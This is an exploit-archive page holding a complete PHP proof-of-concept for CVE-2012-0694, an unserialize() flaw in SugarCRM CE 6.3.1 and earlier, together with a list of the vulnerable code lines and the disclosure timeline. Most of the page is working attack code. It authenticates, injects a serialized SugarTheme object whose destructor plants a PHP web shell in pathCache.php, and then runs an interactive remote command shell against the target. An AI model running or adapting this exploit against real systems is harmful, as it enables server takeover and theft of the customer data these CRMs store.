Home / exploits SugarCRM CE 6.3.1 PHP Code Execution
Posted on 25 June 2012
<?php /* ------------------------------------------------------- SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13s[at]gmail[dot]com software link....: http://www.sugarcrm.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in different locations: include/export_utils.php:377: $searchForm->populateFromArray(unserialize(base64_decode($query))); include/generic/Save2.php:197: $current_query_by_page_array = unserialize(base64_decode($current_query_by_page)); include/MVC/Controller/SugarController.php:593: $_REQUEST = unserialize(base64_decode($temp_req['current_query_by_page'])); include/MVC/View/views/view.list.php:82: $current_query_by_page = unserialize(base64_decode($_REQUEST['current_query_by_page'])); modules/Import/Importer.php:536: $firstrow = unserialize(base64_decode($_REQUEST['firstrow'])); modules/ProjectTask/views/view.list.php:95: $current_query_by_page = unserialize(base64_decode($_REQUEST['current_query_by_page'])); The vulnerability is caused due to all these scripts using "unserialize()" with user controlled input. This can be exploited to e.g. execute arbitrary PHP code via the "__destruct()" method of the "SugarTheme" class, passing an ad-hoc serialized object through the $_REQUEST['current_query_by_page'] input variable. [-] Disclosure timeline: [31/10/2011] - Vulnerability discovered [05/11/2011] - Vendor notified to secure(at)sugarcrm.com [25/11/2011] - Vendor notified to http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/ [07/12/2011] - Vendor fix the issue on his own within 6.4.0 RC1 release [10/01/2012] - CVE number requested [12/01/2012] - Assigned CVE-2012-0694 [06/02/2012] - Issue addressed within 6.4.0 version [23/06/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die(" [-] No response from {$host}:80 "); fputs($sock, $packet); return stream_get_contents($sock); } print " +------------------------------------------------------------+"; print " | SugarCRM CE <= 6.3.1 Remote Code Execution Exploit by EgiX |"; print " +------------------------------------------------------------+ "; if ($argc < 5) { print " Usage......: php $argv[0] <host> <path> <username> <password> "; print " Example....: php $argv[0] localhost / sarah sarah"; print " Example....: php $argv[0] localhost /sugarcrm/ jim jim "; die(); } list($host, $path) = array($argv[1], $argv[2]); $payload = "module=Users&action=Authenticate&user_name={$argv[3]}&user_password={$argv[4]}"; $packet = "POST {$path}index.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: PHPSESSID=1 "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Connection: close {$payload}"; $login = http_send($host, $packet); if (preg_match("/action=Login/", $login)) die(" [-] Login failed! "); if (!preg_match("/Set-Cookie: (.*) path/", $login, $sid)) die(" [-] Session ID not found! "); class SugarTheme { protected $dirName = '../..'; private $_jsCache = '<?php error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD])); ?>'; } $payload = "module=Contacts&Contacts2_CONTACT_offset=1¤t_query_by_page=".base64_encode(serialize(new SugarTheme)); $packet = "POST {$path}index.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cookie: {$sid[1]} "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Connection: close {$payload}"; http_send($host, $packet); $packet = "GET {$path}pathCache.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " sugar-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/s:72:"(.*)";s:8/s', $response, $m) ? print $m[1] : die(" [-] Exploit failed! "); }
